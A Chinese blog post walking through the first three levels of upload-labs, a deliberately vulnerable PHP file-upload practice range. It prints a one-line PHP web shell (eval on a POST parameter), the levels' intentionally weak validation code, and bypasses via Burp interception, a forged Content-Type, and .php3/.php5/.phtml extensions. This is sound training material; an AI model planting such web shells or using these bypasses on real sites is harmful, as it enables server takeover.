#upload -labs Pass01-03

最新推荐文章于 2023-12-20 15:18:42 发布
最新推荐文章于 2023-12-20 15:18:42 发布
阅读量217 收藏 1
点赞数 1
分类专栏: upload 文章标签: upload 01-03
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45106794/article/details/102929760
版权

#upload-labs

pass-01

首先先直接上传hack.php(<?php eval($_POST['READER']);?>),一句话木马试试水

结果出错

“该文件不允许上传,请上传.jpg|.png|.gif类型的文件,当前文件类型为:.php”

盲猜是前端代码所致,所以采用通用做法先上传一句话木马图片hack.jpg

然后通过抓包
在这里插入图片描述
在这里插入图片描述
上传成功,后面就用Cknife连接一句话解决

Pass-02

通过查看源码,发现对上传的文件类型有要求

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

再次通过抓包改包。先直接上传hack.php

在这里插入图片描述

再通过修改Content-Type为image/jpeg,成功上传

再通过C刀连接

Pass-03

通过查看源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

发现对.asp .aspx .php .jsp有过滤,并且就算成功上传后,文件名字也进行了修改,变成时间戳+随机四位数字

(ps:在做这题的时候,环境得在配置一下,要修改httped-conf,在 AddType application/x-httpd-php .php .phtml 这句话后面添上.php3 .php5)

即使如此还是可以进行绕过处理

先直接上传hack.php,再通过burp进行拦截,将请求包发到Repeater中,再将hack.php改为hack.php3 or hack.php5 or hack.phtml

在这里插入图片描述

在这里插入图片描述通过查看Response可以发现

名字被改成了201911060201256707.php3

最后用C刀连接

好好学习不好吗?
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传漏洞——upload-labs(1-10)
Lemon's blog
08-02 2457
前言:文件上传漏洞还有很多知识要学习,这次就通过upload-labs进行学习 第一关 上传有限制,只让上传JPEG或
上传漏洞 upload-labs
lonmar的博客
03-23 770
pass-1 前端js验证 前端js过滤文件后缀名,页面禁用js即可 pass-2 后端MIME验证 Content-Type 实体头部用于指示资源的MIME类型 media type ,在响应中,Content-Type标头告诉客户端实际返回的内容的内容类型。 常见Content-Type https://www.cnblogs.com/klb561/p/10090540.html 源码:...
通关Upload-Labss Pass01-10
cxllwh的博客
12-20 490
1.打开http://localhost/,进入首页,点击Pass-01。2.首先测试上传后缀为jpb的图片直接上传成功。地址为http://localhost/upload/1.jpg。3.构建PHP一句话木马。新建记事本,输入,另存为PHP后缀文件,继续上传,提示报错:该文件不允许上传,请上传.jpg|.png|.gif类型的文件,当前文件类型为:.php4.将一句话木马后缀改为.jpg,然后打开BP,上传抓包查看。
upload-labs之第一关
田田云逸的博客
10-27 4966
一、靶场简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 靶场安装 由于upload-labs 是一个由php 语言编写的靶场,因此需要在php环境下进行使用。我这里推荐用phpstudy集成环境。 靶场项目地址:GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场 将源码下载下来之后,在www目录.
python 中os模块os.path.exists()含义
热门推荐
u012424313的博客
08-30 22万+
os即operating system(操作系统),Python 的 os 模块封装了常见的文件和目录操作。 os.path模块主要用于文件的属性获取,exists是“存在”的意思,所以顾名思义,os.path.exists()就是判断括号里的文件是否存在的意思,括号内的可以是文件路径。 举个栗子: user.py为存在于当前目录的一个文件 输入代码: import os path ...
upload-labs19-20以及总结1
08-08
在Pass19中,开发者试图通过限制上传文件的扩展名来防止这种攻击,但是他们只检查了保存文件名(`save_name`)是否包含黑名单中的扩展名,而未检查实际上传文件的类型。 以下是该关卡的主要知识点: 1. **文件名...
upload-labs-0.1.zip
12-21
1)推荐使用Windows系统搭建(注:使用docker pull c0ny1/upload-labs的镜像在Pass-03会遇到问题,初步判断是该镜像内的php.conf文件配置错误导致)。 2)下载地址 ...
文件上传之upload-labs(一)
01-08
例如,在pass-02的示例中,检查`$_FILES['upload_file']['type']`来确认上传文件是否为合法的图片类型。此外,还应检查文件扩展名,避免通过更改文件名欺骗服务器。使用`move_uploaded_file()`函数将临时文件移动到...
upload-labs一到二十一关解题总结
最新发布
03-18
#### Pass-01: 一句话木马上传技巧 在这一关中,玩家需要上传一个自制的PHP文件(通常是一句话木马)。上传过程中会遇到问题,有两种解决方法: 1. **禁用JavaScript**: - 在Firefox浏览器中启动Web开发者工具...
upload-labs解析.pdf
10-19
Pass-01 Js检查 在Pass-01关卡中,我们需要上传一个图片文件,但是HTML代码中存在js过滤,以阻止恶意文件的上传。为了绕过这个限制,我们可以将index.php文件改名为index.png,上传用burpsuite抓包,然后把文件的...
文件上传漏洞
zhhhb1005的博客
04-24 3077
今天来聊一聊web常见十大漏洞之一——文件上传,这个还是有点面熟的毕竟打过了几次交道,还是有我不熟悉的地方的。 参考博客: 太厉害了,终于有人能把文件上传漏洞讲的明明白白了 文件上传漏洞 一句话木马 二次渲染 条件竞争 ========================================================================= 目录 什么是文件上传漏洞 什么是webshell 一句话木马 入侵条件 产生文件上传漏洞的原因 文...
php中file_exists,php中file_exists函数使用详解
weixin_42501881的博客
03-10 395
php中file_exists函数使用详解2020-06-14 08:13:47说明:bool file_exists ( string $filename )如果由 filename 指定的文件或目录存在则返回 TRUE,否则返回 FALSE。在Windows上,使用/ /计算机名/共享/文件名或 计算机名共享文件名,以检查网络共享文件。在 Windows 中要用 //computername/...
java web - 限制文件的上传类型为图片类型(.gif,.png,.jpg,.jpeg)
qq_31420401的博客
10-10 1万+
1.使用ajax function insertTitle(tValue){ if(tValue!=''){ var len = tValue.length; var str = tValue.substr(tValue.lastIndexOf("."),len); if(str=='.jpg'||str=='.JPG'||str=='.gif'||str=='.GIF'||str=='.
Web文件上传靶场 - 通关笔记
weixin_30790841的博客
08-08 861
Web应用程序通常会提供一些上传功能,比如上传头像,图片资源等,只要与资源传输有关的地方就可能存在上传漏洞,上传漏洞归根结底是程序员在对用户文件上传时控制不足或者是处理的缺陷导致的,文件上传漏洞在渗透测试中用的比较多,因为它是获取服务器WebShell最快最直接的攻击手法,其实文件上传本身并没有问题,有问题的是文件上传时程序员是如何对其进行合法化过滤的,如果程序员的处理逻辑做的不够安全,...
做Excel上传踩的坑
Answer0902的博客
01-14 510
因最近项目需要,所以要做一个Excel上传并解析,但在上传这块我就踩了几天的坑,菜是原罪啊, 我一开始是先在自己的spring boot项目中做的实验,以下是spring boot中的: 前端: <!DOCTYPE html> <html lang="en"> <object></object> <head> <me...
php禁止上传,PHP禁止某些类型的上传文件_PHP教程
weixin_39519741的博客
03-17 768
为了防止某些人将 exe 之类的可执行文件上传到服务器,我们可以编写程序判断上传文件的类型,然后不符合类型的文件将会拒绝上传。下面是实现这一功能的 PHP 程序:function ($file_name, $pass_type = array('jpg','jpeg','gif','bmp','png') ){// 允许文件类型的后缀组成的数组$file = $pass_type;// 截取上传文...
PHP 杂谈 坑爹的file_exists
weixin_33670713的博客
05-06 207
   介绍   我发现了一个问题,今天与大家分享。我把整个过程描述一下。   问题     公司有个框架是基于smarty写的,我负责php的升级,维护人员把新环境布上来之后,测试人员找我提出经常报错(错误:提示找不到文件的)。   我追踪了一下代码,原来是smarty的这个地方报的错误。      错误:这里报出文件不存在。   思考过程:   1、我原以...
CTF文件上传漏洞总结
Mitchell_Donovan的博客
01-20 4766
CTF文件上传漏洞总结 本文使用环境来自于:https://github.com/c0ny1/upload-labs 客户端 js检查 一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。 查看源代码可以看到有如下代码对上传文件类型进行了限制: <script type="text/javascript"> function checkFile() { var file = document.g...
upload-labs pass6
07-28
- *1* [upload-labs靶场-Pass-06关-思路以及过程](https://blog.csdn.net/weixin_44257023/article/details/122506927)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值